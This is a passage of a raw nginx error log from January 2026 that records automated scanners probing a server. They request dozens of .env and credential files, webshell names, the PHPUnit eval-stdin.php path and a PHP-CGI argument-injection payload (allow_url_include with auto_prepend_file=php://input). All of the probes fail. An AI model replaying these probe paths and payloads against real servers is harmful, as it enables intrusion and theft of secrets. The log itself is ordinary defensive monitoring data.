"92.249.249.197" +2026/01/15 10:06:31 [error] 305#305: *125173 open() "/var/www/html/assets/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /assets/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 10:06:31 [error] 305#305: *125174 open() "/var/www/html/sendgrid.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /sendgrid.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 10:06:32 [error] 306#306: *125175 open() "/var/www/html/sources/.env.prod" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /sources/.env.prod HTTP/1.1", host: "92.249.249.197" +2026/01/15 10:06:32 [error] 306#306: *125176 open() "/var/www/html/sources/.env.production" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /sources/.env.production HTTP/1.1", host: "92.249.249.197" +2026/01/15 10:06:32 [error] 306#306: *125177 open() "/var/www/html/v1/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /v1/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 10:06:32 [error] 306#306: *125178 open() "/var/www/html/js/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /js/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 10:06:32 [error] 306#306: *125179 open() "/var/www/html/boot/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /boot/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 10:06:32 [error] 306#306: *125180 open() "/var/www/html/run/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /run/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 10:06:32 [error] 306#306: *125181 open() "/var/www/html/proc/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /proc/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 10:47:28 [error] 313#313: *125202 open() "/var/www/html/wp-content/plugins/hellopress/wp_filemanager.php" failed (2: No such file or directory), client: 132.196.4.69, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 10:47:28 [error] 313#313: *125202 open() "/var/www/html/ver.php" failed (2: No such file or directory), client: 132.196.4.69, server: localhost-nginx-proxy-manager, request: "GET /ver.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 10:47:28 [error] 313#313: *125202 open() "/var/www/html/ultra.php" failed (2: No such file or directory), client: 132.196.4.69, server: localhost-nginx-proxy-manager, request: "GET /ultra.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 10:47:28 [error] 313#313: *125202 open() "/var/www/html/pro.php" failed (2: No such file or directory), client: 132.196.4.69, server: localhost-nginx-proxy-manager, request: "GET /pro.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 10:47:28 [error] 313#313: *125202 open() "/var/www/html/wp-good.php" failed (2: No such file or directory), client: 132.196.4.69, server: localhost-nginx-proxy-manager, request: "GET /wp-good.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 10:47:29 [error] 313#313: *125202 open() "/var/www/html/e.php" failed (2: No such file or directory), client: 132.196.4.69, server: localhost-nginx-proxy-manager, request: "GET /e.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 10:47:29 [error] 313#313: *125202 open() "/var/www/html/data.php" failed (2: No such file or directory), client: 132.196.4.69, server: localhost-nginx-proxy-manager, request: "GET /data.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 10:47:29 [error] 313#313: *125202 open() "/var/www/html/abcd.php" failed (2: No such file or directory), client: 132.196.4.69, server: localhost-nginx-proxy-manager, request: "GET /abcd.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 10:47:29 [error] 313#313: *125202 open() "/var/www/html/z.php" failed (2: No such file or directory), client: 132.196.4.69, server: localhost-nginx-proxy-manager, request: "GET /z.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 10:47:30 [error] 313#313: *125202 open() "/var/www/html/css.php" failed (2: No such file or directory), client: 132.196.4.69, server: localhost-nginx-proxy-manager, request: "GET /css.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 10:47:30 [error] 313#313: *125202 open() "/var/www/html/image.php" failed (2: No such file or directory), client: 132.196.4.69, server: localhost-nginx-proxy-manager, request: "GET /image.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 10:47:30 [error] 313#313: *125202 open() "/var/www/html/file22.php" failed (2: No such file or directory), client: 132.196.4.69, server: localhost-nginx-proxy-manager, request: "GET /file22.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 10:47:30 [error] 313#313: *125202 open() "/var/www/html/check.php" failed (2: No such file or directory), client: 132.196.4.69, server: localhost-nginx-proxy-manager, request: "GET /check.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 10:47:30 [error] 313#313: *125202 open() "/var/www/html/wp-header-json.php" failed (2: No such file or directory), client: 132.196.4.69, server: localhost-nginx-proxy-manager, request: "GET /wp-header-json.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 10:47:30 [error] 313#313: *125202 open() "/var/www/html/fm.php" failed (2: No such file or directory), client: 132.196.4.69, server: localhost-nginx-proxy-manager, request: "GET /fm.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 10:47:31 [error] 313#313: *125202 open() "/var/www/html/1.php" failed (2: No such file or directory), client: 132.196.4.69, server: localhost-nginx-proxy-manager, request: "GET /1.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 10:47:31 [error] 313#313: *125202 open() "/var/www/html/ws.php" failed (2: No such file or directory), client: 132.196.4.69, server: localhost-nginx-proxy-manager, request: "GET /ws.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 10:47:31 [error] 313#313: *125202 open() "/var/www/html/xxxx.php" failed (2: No such file or directory), client: 132.196.4.69, server: localhost-nginx-proxy-manager, request: "GET /xxxx.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 10:47:31 [error] 313#313: *125202 open() "/var/www/html/wp-configs.php" failed (2: No such file or directory), client: 132.196.4.69, server: localhost-nginx-proxy-manager, request: "GET /wp-configs.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 10:47:31 [error] 313#313: *125202 open() "/var/www/html/xmlrpc.php" failed (2: No such file or directory), client: 132.196.4.69, server: localhost-nginx-proxy-manager, request: "GET /xmlrpc.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 10:47:31 [error] 313#313: *125202 open() "/var/www/html/file56.php" failed (2: No such file or directory), client: 132.196.4.69, server: localhost-nginx-proxy-manager, request: "GET /file56.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 10:47:32 [error] 313#313: *125202 open() "/var/www/html/990.php" failed (2: No such file or directory), client: 132.196.4.69, server: localhost-nginx-proxy-manager, request: "GET /990.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 10:47:32 [error] 313#313: *125202 open() "/var/www/html/error.php" failed (2: No such file or directory), client: 132.196.4.69, server: localhost-nginx-proxy-manager, request: "GET /error.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 10:47:32 [error] 313#313: *125202 open() "/var/www/html/admin.php" failed (2: No such file or directory), client: 132.196.4.69, server: localhost-nginx-proxy-manager, request: "GET /admin.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 10:47:32 [error] 313#313: *125202 open() "/var/www/html/bless.php" failed (2: No such file or directory), client: 132.196.4.69, server: localhost-nginx-proxy-manager, request: "GET /bless.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/15 11:02:24 [error] 315#315: *125213 open() "/var/www/html/manager/text/list" failed (2: No such file or directory), client: 40.119.28.203, server: localhost-nginx-proxy-manager, request: "GET /manager/text/list HTTP/1.1", host: "92.249.249.197" +2026/01/15 11:40:36 [error] 312#312: *125216 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 11:40:36 [error] 312#312: *125217 open() "/var/www/html/dev/.env~" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /dev/.env~ HTTP/1.1", host: "92.249.249.197" +2026/01/15 11:40:36 [error] 312#312: *125218 open() "/var/www/html/lara/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /lara/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 11:40:37 [error] 312#312: *125219 open() "/var/www/html/dev/.env0" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /dev/.env0 HTTP/1.1", host: "92.249.249.197" +2026/01/15 11:40:37 [error] 312#312: *125220 open() "/var/www/html/node/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /node/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 11:40:38 [error] 312#312: *125221 open() "/var/www/html/jest/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /jest/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 11:40:38 [error] 312#312: *125222 open() "/var/www/html/helm/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /helm/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 11:40:38 [error] 312#312: *125223 open() "/var/www/html/debug.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /debug.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 11:40:38 [error] 312#312: *125224 open() "/var/www/html/next/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /next/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 11:40:38 [error] 312#312: *125225 open() "/var/www/html/env.local" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /env.local HTTP/1.1", host: "92.249.249.197" +2026/01/15 11:40:38 [error] 312#312: *125226 open() "/var/www/html/envs/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /envs/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 11:40:39 [error] 312#312: *125227 open() "/var/www/html/email.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /email.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 11:40:39 [error] 312#312: *125228 open() "/var/www/html/env_2.txt" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /env_2.txt HTTP/1.1", host: "92.249.249.197" +2026/01/15 11:40:39 [error] 312#312: *125229 open() "/var/www/html/front.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /front.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 11:40:39 [error] 312#312: *125230 open() "/var/www/html/nest/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /nest/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 11:40:39 [error] 313#313: *125231 open() "/var/www/html/brevo.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /brevo.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 11:40:39 [error] 313#313: *125232 open() "/var/www/html/api/.env0" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /api/.env0 HTTP/1.1", host: "92.249.249.197" +2026/01/15 11:40:39 [error] 313#313: *125233 open() "/var/www/html/.env_user" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /.env_user HTTP/1.1", host: "92.249.249.197" +2026/01/15 11:40:39 [error] 313#313: *125234 open() "/var/www/html/BACK/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /BACK/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 11:40:39 [error] 313#313: *125235 open() "/var/www/html/.prod-env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /.prod-env HTTP/1.1", host: "92.249.249.197" +2026/01/15 11:40:40 [error] 313#313: *125236 open() "/var/www/html/admin.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /admin.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 11:40:40 [error] 313#313: *125237 open() "/var/www/html/app/.env~" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /app/.env~ HTTP/1.1", host: "92.249.249.197" +2026/01/15 11:40:40 [error] 313#313: *125238 open() "/var/www/html/User/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /User/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 11:40:40 [error] 313#313: *125239 open() "/var/www/html/cloud.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /cloud.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 11:40:40 [error] 313#313: *125240 open() "/var/www/html/api/.env~" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /api/.env~ HTTP/1.1", host: "92.249.249.197" +2026/01/15 11:40:40 [error] 313#313: *125241 open() "/var/www/html/cicd/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /cicd/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 11:40:40 [error] 313#313: *125242 open() "/var/www/html/Lara/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /Lara/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 11:40:41 [error] 313#313: *125243 open() "/var/www/html/build.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /build.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 11:40:41 [error] 313#313: *125244 open() "/var/www/html/.env-ssrf" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /.env-ssrf HTTP/1.1", host: "92.249.249.197" +2026/01/15 11:40:41 [error] 313#313: *125245 open() "/var/www/html/.env-smtp" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /.env-smtp HTTP/1.1", host: "92.249.249.197" +2026/01/15 11:40:41 [error] 313#313: *125246 open() "/var/www/html/.env_path" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /.env_path HTTP/1.1", host: "92.249.249.197" +2026/01/15 12:03:29 [error] 314#314: *125252 open() "/var/www/html/.env" failed (2: No such file or directory), client: 45.119.212.42, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 12:03:29 [error] 314#314: *125254 open() "/var/www/html/env" failed (2: No such file or directory), client: 45.119.212.42, server: localhost-nginx-proxy-manager, request: "GET /env HTTP/1.1", host: "92.249.249.197" +2026/01/15 12:03:30 [error] 314#314: *125256 open() "/var/www/html/public/.env" failed (2: No such file or directory), client: 45.119.212.42, server: localhost-nginx-proxy-manager, request: "GET /public/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 12:03:31 [error] 314#314: *125258 open() "/var/www/html/public/env" failed (2: No such file or directory), client: 45.119.212.42, server: localhost-nginx-proxy-manager, request: "GET /public/env HTTP/1.1", host: "92.249.249.197" +2026/01/15 12:03:32 [error] 314#314: *125260 open() "/var/www/html/app/.env" failed (2: No such file or directory), client: 45.119.212.42, server: localhost-nginx-proxy-manager, request: "GET /app/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 12:09:31 [error] 314#314: *125267 "/var/www/html/webui/index.html" is not found (2: No such file or directory), client: 64.62.156.182, server: localhost-nginx-proxy-manager, request: "GET /webui/ HTTP/1.1", host: "92.249.249.197" +2026/01/15 12:11:01 [error] 313#313: *126756 open() "/var/www/html/login" failed (2: No such file or directory), client: 193.142.146.230, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 12:11:40 [error] 313#313: *126758 "/var/www/html/geoserver/web/index.html" is not found (2: No such file or directory), client: 64.62.156.182, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/ HTTP/1.1", host: "92.249.249.197" +2026/01/15 12:19:59 [error] 313#313: *126763 open() "/var/www/html/.env" failed (2: No such file or directory), client: 185.241.208.170, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 12:41:45 [error] 313#313: *126774 open() "/var/www/html/cgi/conf.bin" failed (2: No such file or directory), client: 194.50.16.253, server: localhost-nginx-proxy-manager, request: "GET /cgi/conf.bin HTTP/1.1", host: "92.249.249.197", referrer: "http://92.249.249.197:80/mainFrame.htm" +2026/01/15 13:11:09 [error] 314#314: *126778 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:10 [error] 314#314: *126778 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:10 [error] 314#314: *126778 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:11 [error] 314#314: *126778 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:11 [error] 314#314: *126778 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:11 [error] 314#314: *126778 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:11 [error] 314#314: *126778 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:12 [error] 314#314: *126778 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:13 [error] 314#314: *126778 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:13 [error] 314#314: *126778 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:13 [error] 314#314: *126778 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:13 [error] 314#314: *126778 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:14 [error] 314#314: *126778 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:14 [error] 314#314: *126778 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:15 [error] 314#314: *126778 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:16 [error] 314#314: *126778 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:16 [error] 314#314: *126778 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:16 [error] 314#314: *126778 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:16 [error] 314#314: *126778 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:17 [error] 314#314: *126778 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:18 [error] 314#314: *126778 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:18 [error] 314#314: *126778 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:18 [error] 314#314: *126778 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:19 [error] 314#314: *126778 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:19 [error] 314#314: *126778 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:19 [error] 314#314: *126778 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:20 [error] 314#314: *126778 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:20 [error] 314#314: *126778 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:21 [error] 314#314: *126778 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:21 [error] 314#314: *126778 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:21 [error] 314#314: *126778 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:22 [error] 314#314: *126778 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:22 [error] 314#314: *126778 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:23 [error] 314#314: *126778 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:24 [error] 314#314: *126778 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:25 [error] 314#314: *126778 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:25 [error] 314#314: *126778 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.104.242, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 13:11:25 [error] 314#314: *126778 open() 